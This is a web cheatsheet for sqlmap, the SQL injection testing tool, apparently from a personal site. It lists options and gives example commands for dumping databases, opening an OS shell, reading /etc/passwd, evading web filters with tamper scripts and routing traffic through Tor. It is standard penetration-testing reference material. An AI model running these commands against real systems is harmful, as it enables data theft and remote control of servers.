__ _______________________ _________._________________________ \_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/ | __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_ | \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \ \___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ / \/ \/ \/ \/ \/ \/ \/

sqlmap Cheatsheet

← Back to cheatsheets

← Home

sqlmap is an automated SQL injection testing and exploitation tool. It can detect and exploit SQL injection vulnerabilities in web applications, supporting multiple database management systems.

Basic Usage

  • sqlmap -u <url> - Test URL for SQL injection
  • sqlmap -u "http://target.com/page.php?id=1" - Test specific URL
  • sqlmap -u <url> --dbs - Enumerate databases
  • sqlmap -u <url> -D <database> --tables - Enumerate tables
  • sqlmap -u <url> -D <database> -T <table> --columns - Enumerate columns
  • sqlmap -u <url> -D <database> -T <table> --dump - Dump table data

Target Options

  • -u <url> - Target URL
  • -l <file> - Target list from Burp log file
  • -x <url> - Sitemap URL (XML)
  • -m <file> - Multiple targets from file
  • -r <file> - HTTP request from file
  • -g <query> - Google dork query
  • -c <file> - Configuration file

Request Options

  • --data=<data> - POST data string
  • --cookie=<cookie> - Cookie string
  • --headers=<headers> - HTTP headers
  • --user-agent=<ua> - User-Agent string
  • --referer=<referer> - Referer string
  • --proxy=<proxy> - Use HTTP proxy
  • --tor --tor-type=SOCKS5 --check-tor - Use Tor proxy
  • -H - Set custom HTTP header
  • --method=<method> - HTTP method (GET, POST, PUT, etc.)

Parameter Options

  • -p <parameter> - Test specific parameter
  • --skip=<param> - Skip testing parameter
  • -r <file> - Load HTTP request from file (auto-detect parameters)
  • --param-del=<delimiter> - Parameter delimiter

Enumeration Options

  • --dbs - Enumerate databases
  • --tables - Enumerate tables
  • --columns - Enumerate columns
  • --dump - Dump table entries
  • --dump-all - Dump all databases
  • -D <database> - Specify database
  • -T <table> - Specify table
  • -C <column> - Specify column
  • --schema - Enumerate database schema
  • --count - Count entries in table

Database System Options

  • --dbms=<dbms> - Force database type (MySQL, PostgreSQL, MSSQL, Oracle, SQLite)
  • --dbms-cred=<user:pass> - Database credentials
  • --os=<os> - Force OS type
  • --tamper=<script> - Use tamper script

File Operations

  • --file-read=<file> - Read file from database server
  • --file-write=<file> - Write local file to database server
  • --file-dest=<path> - Remote file path for write operations

Shell Options

  • --sql-shell - Interactive SQL shell
  • --os-shell - Interactive OS shell
  • --os-cmd=<cmd> - Execute OS command
  • --os-pwn - Meterpreter shell
  • --os-smbrelay - SMB relay attack

Detection Options

  • --level=<1-5> - Level of tests (1-5, default 1)
  • --risk=<1-3> - Risk of tests (1-3, default 1)
  • --technique=<technique> - Injection techniques (B, E, U, S, T, Q)
  • --time-sec=<sec> - Seconds to wait for response (default 5)
  • --union-cols=<range> - Column range for UNION tests

Technique Options

  • B - Boolean-based blind
  • E - Error-based
  • U - Union query-based
  • S - Stacked queries
  • T - Time-based blind
  • Q - Inline queries

Output Options

  • --batch - Never ask for user input (use defaults)
  • --verbose=<0-6> - Verbosity level
  • -v <level> - Verbosity level (0-6)
  • --output-dir=<dir> - Output directory

Misc Options

  • --threads=<num> - Max concurrent HTTP requests (default 1)
  • --delay=<sec> - Delay between requests (seconds)
  • --timeout=<sec> - Request timeout (default 30)
  • --retries=<num> - Retries on timeout (default 3)
  • --ignore-code=<code> - Ignore HTTP error codes
  • --ignore-proxy - Ignore default proxy settings

Common Examples

Basic Detection

sqlmap -u "http://target.com/page.php?id=1"

Enumerate Databases

sqlmap -u "http://target.com/page.php?id=1" --dbs

Enumerate Tables

sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

Dump Table

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

POST Request

sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" -p username

From Burp Log

sqlmap -l burp_log.txt --batch

Cookie Injection

sqlmap -u "http://target.com/page.php" --cookie="session=abc123" --dbs

Get OS Shell

sqlmap -u "http://target.com/page.php?id=1" --os-shell

Read File

sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"

Use Tor

sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5 --check-tor

Tips

  • Use --batch for automated testing (no user interaction)
  • Use -r with Burp log files for easy testing
  • Increase --level and --risk for more thorough testing
  • Use --threads for faster enumeration (be careful with server load)
  • Combine with Burp Suite for complex authentication scenarios
  • Use --tamper scripts to bypass WAFs and filters
  • Always test on authorized systems only
  • Use --proxy to monitor requests with Burp or similar tools
  • Check --check-tor before using Tor to verify connection
  • Use --batch to avoid prompts in automated scripts

← Back to cheatsheets

← Home